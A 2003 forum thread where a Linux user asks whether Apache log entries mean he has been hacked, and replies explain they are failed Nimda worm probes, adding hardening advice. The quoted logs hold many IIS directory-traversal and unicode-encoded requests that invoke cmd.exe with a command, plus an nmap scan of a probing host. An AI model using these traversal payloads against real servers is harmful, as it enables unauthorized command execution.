Page 1 of 2 12 LastLast
Results 1 to 10 of 18

Thread: hacked

  1. #1
    Senior Member
    Join Date
    Dec 2002
    Posts
    144

    hacked

    203.125.121.32 - - [06/Feb/2003:20:01:48 +0800] "GET / HTTP/1.1" 403 2898 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.1) Gecko/20020830"
    203.125.121.32 - - [06/Feb/2003:20:01:49 +0800] "GET /icons/apache_pb.gif HTTP/1.1" 200 2326 "http://203.125.121.32/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.1) Gecko/20020830"
    203.125.121.32 - - [06/Feb/2003:20:01:50 +0800] "GET /icons/powered_by.gif HTTP/1.1" 200 581 "http://203.125.121.32/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.1) Gecko/20020830"
    220.255.74.215 - - [06/Feb/2003:22:08:48 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:50 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:50 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:50 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:51 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:51 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:51 +0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:51 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:51 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:52 +0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:52 +0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:52 +0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:52 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 974 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:52 +0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 974 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:52 +0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:22:08:52 +0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:07 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:08 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:09 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:09 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:09 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:10 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:10 +0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:10 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:10 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:11 +0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:11 +0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:11 +0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:14 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 974 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:17 +0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 974 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:26 +0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    220.255.74.215 - - [06/Feb/2003:23:14:29 +0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:13 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:14 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:14 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:15 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:15 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:15 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:15 +0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:15 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:18 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:21 +0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:33 +0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:33 +0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:33 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 974 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:33 +0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 974 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:34 +0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.11.114 - - [09/Feb/2003:23:27:34 +0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.41.23 - - [13/Feb/2003:06:08:55 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.125.41.23 - - [13/Feb/2003:06:09:16 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"

    i found this in my linux box which i ran the httpd...i read some book and this is an indication that my system been hacked?is this kind of hacking onli effective on IIS?what wil this do to my system. what kind of software they using to do this kind of hacking?
    BlAcKiE
    GearBlitz

  2. #2
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356
    Ok, short answer, no you haven't been hacked. What you are seeing is the various incarnations of nimda trying to check your box to see if you are succeptible. Here is why you are not hacked:

    1) You are running linux. These vulnerabilities only effect M$ stuff running IIS.
    2) Judging from the log files this looks like apache, which is not vulnerable to these attacks.

    Lastly, Take a look at the entry after the "GET ...." xxx yyyy "-" "-"

    xxx is the HTTP code returned by your webserver for that request
    yyy is the number of bytes of the response

    If you go to:

    IETF specifications for HTTP

    You will see in chapter 10 a definition of what the response codes mean. Every response either returned 400 or 404. A quick glimpse through the specs and you will see

    404 == 404 Not Found
    400 == 400 Bad Request

    Neither of which indicate success...

    Now if this was a different attack and you saw HTTP return 200 (ok), then you should start to worry....


    That make sense?

    /nebulus

    EDIT:

    203.125.121.32 - - [06/Feb/2003:20:01:48 +0800] "GET / HTTP/1.1" 403 2898 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.1) Gecko/20020830"
    203.125.121.32 - - [06/Feb/2003:20:01:49 +0800] "GET /icons/apache_pb.gif HTTP/1.1" 200 2326 "http://203.125.121.32/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.1) Gecko/20020830"
    203.125.121.32 - - [06/Feb/2003:20:01:50 +0800] "GET /icons/powered_by.gif HTTP/1.1" 200 581 "http://203.125.121.32/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.1) Gecko/20020830"
    These lines are interesting for two reasons...

    line 1: 403 was returned. This is forbidden.
    line 2/3 : 200 was returned. This was successful. (no biggy, just downloaded some gifs)

    Line 1: The last dash was replaced by "Mozilla/5.0 ...." . This is the type of browser that was used to access the page, if apache could figure it out. Notice how all those nimda lines end in "-" "-"...that means it couldn't detect a browser version...which means it was probably done either by a worm or someone using something like 'telnet' or 'netcat' to do the connection and then use HTTP commands to get the web page.


    EDIT 2:

    Man I love apache logs, so much information there (unlike IIS). The last thing of interest from your log files...notice how fast those connections were in your logs. Most of the connections from the ip where done several in the same second, most no more than five seconds apart. This should indicate to you that it was at a minimum automated (it would be difficult from someone to type that fast, if not impossible).



    Verdit: Meaningless attacks by nimda infested hosts to which you were not vulnerable. T
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)

  3. #3
    Senior Member
    Join Date
    Jan 2002
    Posts
    371
    This is a unicode attack and MS 4.0 and 5.0 IIS Webservers are vulnerable unless they are hardened or had the appropriate patches applied.

    If you have a IIS Webserver, they are full of security vulnerabilities and exploits. I suggest that you get a copy of the IIS Lockdown Tool from the M$ webpage.
    SoggyBottom.

    [glowpurple]There were so many fewer questions when the stars where still just the holes to heaven - JJ[/glowpurple] [gloworange]I sure could use a vacation from this bull$hit, three ringed circus side show of freaks. - Tool. [/gloworange]

  4. #4
    Senior Member
    Join Date
    Dec 2002
    Posts
    144
    **** i really got hacked...just onli...about 0715hrs...the symtoms was that i suddenly cannot access my access_log...then i went to top my linux...i saw a process call some update one...then my system went a bit hangy and my hdd activities was on...after a while the hdd activities stopped...so i went to cat my access_log...everything was gone...security_log was gone, mysql, apache err log and sendmail log were all gone...i nmap my system and the port open were as usual...so i supposed someone just came in and del my log files...what did the guy do to del my log?my root passwd was not changed...how did he got access to my system?

    what is the update process for?my system log also gone...

    Originally posted here by nebulus200
    Ok, short answer, no you haven't been hacked. What you are seeing is the various incarnations of nimda trying to check your box to see if you are succeptible. Here is why you are not hacked:

    1) You are running linux. These vulnerabilities only effect M$ stuff running IIS.
    2) Judging from the log files this looks like apache, which is not vulnerable to these attacks.

    Lastly, Take a look at the entry after the "GET ...." xxx yyyy "-" "-"

    xxx is the HTTP code returned by your webserver for that request
    yyy is the number of bytes of the response

    If you go to:

    IETF specifications for HTTP

    You will see in chapter 10 a definition of what the response codes mean. Every response either returned 400 or 404. A quick glimpse through the specs and you will see

    404 == 404 Not Found
    400 == 400 Bad Request

    Neither of which indicate success...

    Now if this was a different attack and you saw HTTP return 200 (ok), then you should start to worry....


    That make sense?

    /nebulus

    EDIT:



    These lines are interesting for two reasons...

    line 1: 403 was returned. This is forbidden.
    line 2/3 : 200 was returned. This was successful. (no biggy, just downloaded some gifs) <- i think he is trying to test what web server i am running man, my log was all deleted. the powered_by.gif is a gif that shows 'powered by redhat linux' and the the apache_pb.gif is a picture of apache?**** man got spied. how command he used to issue the HTTP command in the telnet?

    Line 1: The last dash was replaced by "Mozilla/5.0 ...." . This is the type of browser that was used to access the page, if apache could figure it out. Notice how all those nimda lines end in "-" "-"...that means it couldn't detect a browser version...which means it was probably done either by a worm or someone using something like 'telnet' or 'netcat' to do the connection and then use HTTP commands to get the web page.


    EDIT 2:

    Man I love apache logs, so much information there (unlike IIS). The last thing of interest from your log files...notice how fast those connections were in your logs. Most of the connections from the ip where done several in the same second, most no more than five seconds apart. This should indicate to you that it was at a minimum automated (it would be difficult from someone to type that fast, if not impossible).



    Verdit: Meaningless attacks by nimda infested hosts to which you were not vulnerable. T
    so u mean the attacker also runs on Linux baesd on the apache log?
    BlAcKiE
    GearBlitz

  5. #5
    Senior Member
    Join Date
    May 2002
    Posts
    450
    penguin,

    check your cron and make sure that your log files were not being rotated/compressed at this time, if so you may find the log files in the /var/log directory with the .gz extension. This could explain the hdd activity etc ...

    nebulus200 is absolutely correct, your linux box is not compromised by this attack, I see it all the time here as well - it just fills the log files with rubbish.

  6. #6
    Senior Member
    Join Date
    Dec 2002
    Posts
    144
    Originally posted here by Phat_Penguin
    penguin,

    check your cron and make sure that your log files were not being rotated/compressed at this time, if so you may find the log files in the /var/log directory with the .gz extension. This could explain the hdd activity etc ...

    nebulus200 is absolutely correct, your linux box is not compromised by this attack, I see it all the time here as well - it just fills the log files with rubbish.
    Feb 13 07:15:42 bb-203-125-80-216 anacron[854]: Job `cron.daily' terminated
    Feb 13 07:18:20 bb-203-125-80-216 anacron[854]: Job `cron.weekly' started
    Feb 13 07:18:21 bb-203-125-80-216 anacron[4511]: Updated timestamp for job `cron.weekly' to 2003-02-13
    Feb 13 07:22:08 bb-203-125-80-216 anacron[854]: Job `cron.weekly' terminated
    Feb 13 07:22:08 bb-203-125-80-216 anacron[854]: Normal exit (2 jobs run)

    this is onli left in my cron file...
    BlAcKiE
    GearBlitz

  7. #7
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356
    If your access_log is gone, where did you get those entries?

    I have no idea whether your box was hacked or not, but one thing I can say for certain:
    Based on the logs you showed here, I can say with 100% certaintity, that it is 100% impossible that you would have been compromised by those attacks shown in the logs you printed here. You may have another service that is vulnerable (type netstat -an) that someone got in on, maybe you have a badly misconfigured web server that allows write access to your logs, who knows, there are alot of possibilities (not all of which mean you have been hacked).

    As far as you losing files, it could be the result of a hack, maybe your logging daemon crashed, maybe your system lost power while writing to / opening the file and the file was lost...there are more than one reason that those logs could be gone.

    If your system is fairly new (which is how I take it), back up your data only to a CDROM (don't access any network services) and build the system from scratch. Be sure to check any other computers that may have had a trust relationship with that computer for unauthorized access and if you aren't running a switched environment change all passwords.

    Make sure your patches are up to date, make sure you have turned off all unused services, and search around for some tutorials on hardening linux. You mentioned something about an update...are you running red hat's auto update thing? Maybe it hosed up...not sure.

    Good luck,

    /nebulus
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)

  8. #8
    Senior Member
    Join Date
    Dec 2002
    Posts
    144
    found something new...

    203.66.22.53 - - [13/Feb/2003:07:40:03 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.66.22.53 - - [13/Feb/2003:07:40:04 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1041 "-" "-" <- what is this line doing?
    203.66.22.53 - - [13/Feb/2003:07:40:04 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.66.22.53 - - [13/Feb/2003:07:40:05 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.66.22.53 - - [13/Feb/2003:07:40:06 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.66.22.53 - - [13/Feb/2003:07:40:06 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.66.22.53 - - [13/Feb/2003:07:40:07 +0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.66.22.53 - - [13/Feb/2003:07:40:08 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.66.22.53 - - [13/Feb/2003:07:40:08 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.66.22.53 - - [13/Feb/2003:07:40:12 +0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.66.22.53 - - [13/Feb/2003:07:40:13 +0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"
    203.66.22.53 - - [13/Feb/2003:07:40:13 +0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1041 "-" "-"

    lastest log...and i nmap the ip and it gave me this...

    Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
    No tcp,udp, or ICMP scantype specified, assuming SYN Stealth scan. Use -sP if yo
    u really don't want to portscan (and just want to see what hosts are up).
    Host (203.66.22.53) appears to be up ... good.
    Initiating SYN Stealth Scan against (203.66.22.53)
    Adding open port 135/tcp
    Adding open port 1025/tcp
    Adding open port 445/tcp
    Adding open port 1033/tcp
    Adding open port 3372/tcp
    Adding open port 1478/tcp
    Adding open port 1026/tcp
    Adding open port 139/tcp
    Adding open port 3049/tcp
    adjust_timeout: packet supposedly had rtt of 9028073 microseconds. Ignoring tim e.
    The SYN Stealth Scan took 298 seconds to scan 1601 ports.
    Interesting ports on (203.66.22.53):
    (The 1591 ports scanned but not shown below are in state: closed)
    Port State Service
    80/tcp filtered http
    135/tcp open loc-srv
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds
    1025/tcp open NFS-or-IIS
    1026/tcp open LSA-or-nterm
    1033/tcp open netinfo
    1478/tcp open ms-sna-base
    3049/tcp open cfs
    3372/tcp open msdtc

    Nmap run completed -- 1 IP address (1 host up) scanned in 299 seconds

    what r all this port open for?

    Originally posted here by nebulus200
    [B]If your access_log is gone, where did you get those entries?
    i installed the system on 6 Feb 03 and b4 i left so few entries i have been looking at the log using Systems Log application...when my hdd was having some activites just now...i started to see nothing in the log file

    I have no idea whether your box was hacked or not, but one thing I can say for certain:
    Based on the logs you showed here, I can say with 100% certaintity, that it is 100% impossible that you would have been compromised by those attacks shown in the logs you printed here. You may have another service that is vulnerable (type netstat -an) that someone got in on, maybe you have a badly misconfigured web server that allows write access to your logs, who knows, there are alot of possibilities (not all of which mean you have been hacked).

    As far as you losing files, it could be the result of a hack, maybe your logging daemon crashed, maybe your system lost power while writing to / opening the file and the file was lost...there are more than one reason that those logs could be gone.

    If your system is fairly new (which is how I take it), back up your data only to a CDROM (don't access any network services) and build the system from scratch. Be sure to check any other computers that may have had a trust relationship with that computer for unauthorized access and if you aren't running a switched environment change all passwords.

    Make sure your patches are up to date, make sure you have turned off all unused services, and search around for some tutorials on hardening linux. You mentioned something about an update...are you running red hat's auto update thing? Maybe it hosed up...not sure.

    Good luck,

    /nebulus
    i am not sure what redhat auto update is it...i just setup the linux on adsl ethernet modem...so basically i am directly on the net...no firewall or what...

    No exact OS matches for host (If you know what OS is running on it, see http://www.insecure.org/cgi-bin/nmap-submit.cgi).
    TCP/IP fingerprint:
    SInfo(V=3.00%P=i686-pc-linux-gnu%D=2/13%Time=3E4AE295%O=135%C=1)
    TSeq(Class=RI%gcd=1%SI=A3709%TS=0)
    TSeq(Class=RI%gcd=1%SI=85CFE%IPID=RD%TS=0)
    TSeq(Class=RI%gcd=2%SI=3EB2E%TS=0)
    T1(Resp=Y%DF=Y%W=402E%ACK=S++%Flags=AS%Ops=MNWNNT)
    T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
    T3(Resp=N)
    T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
    T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
    T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
    T7(Resp=N)
    PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)

    what do u think the OS running on 203.66.22.53?
    BlAcKiE
    GearBlitz

  9. #9
    Senior Member
    Join Date
    May 2002
    Posts
    450
    Refer back to nebulus200 first reply .... that line returned a 404 message (File not found) so basically its knocking on the door but can't come in - nothing to worry about.

    I see the hdd activity corresponded with cron job time stamps. That would explain the activity.

    If you are new to linux check out Bastille at http://www.bastille-linux.org, it is a hardening/firewall script which has been written for Redhat and others and will help you lock down your machine fairly securely until you get the hang of things. It has a user friendly GUI and has a step by step configuration with explanations as to what it is doing - so the set up is fairly straight forward.

    As you are on an adsl connection you really do need to lock the machine down as you will be a prime target for crackers.

  10. #10
    Senior Member
    Join Date
    Dec 2002
    Posts
    144
    Originally posted here by Phat_Penguin
    Refer back to nebulus200 first reply .... that line returned a 404 message (File not found) so basically its knocking on the door but can't come in - nothing to worry about.

    I see the hdd activity corresponded with cron job time stamps. That would explain the activity.

    If you are new to linux check out Bastille at http://www.bastille-linux.org, it is a hardening/firewall script which has been written for Redhat and others and will help you lock down your machine fairly securely until you get the hang of things. It has a user friendly GUI and has a step by step configuration with explanations as to what it is doing - so the set up is fairly straight forward.

    As you are on an adsl connection you really do need to lock the machine down as you will be a prime target for crackers.
    but what do u suspect could have happened?thanks for providing the site...i will try to harden it from now..
    BlAcKiE
    GearBlitz

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •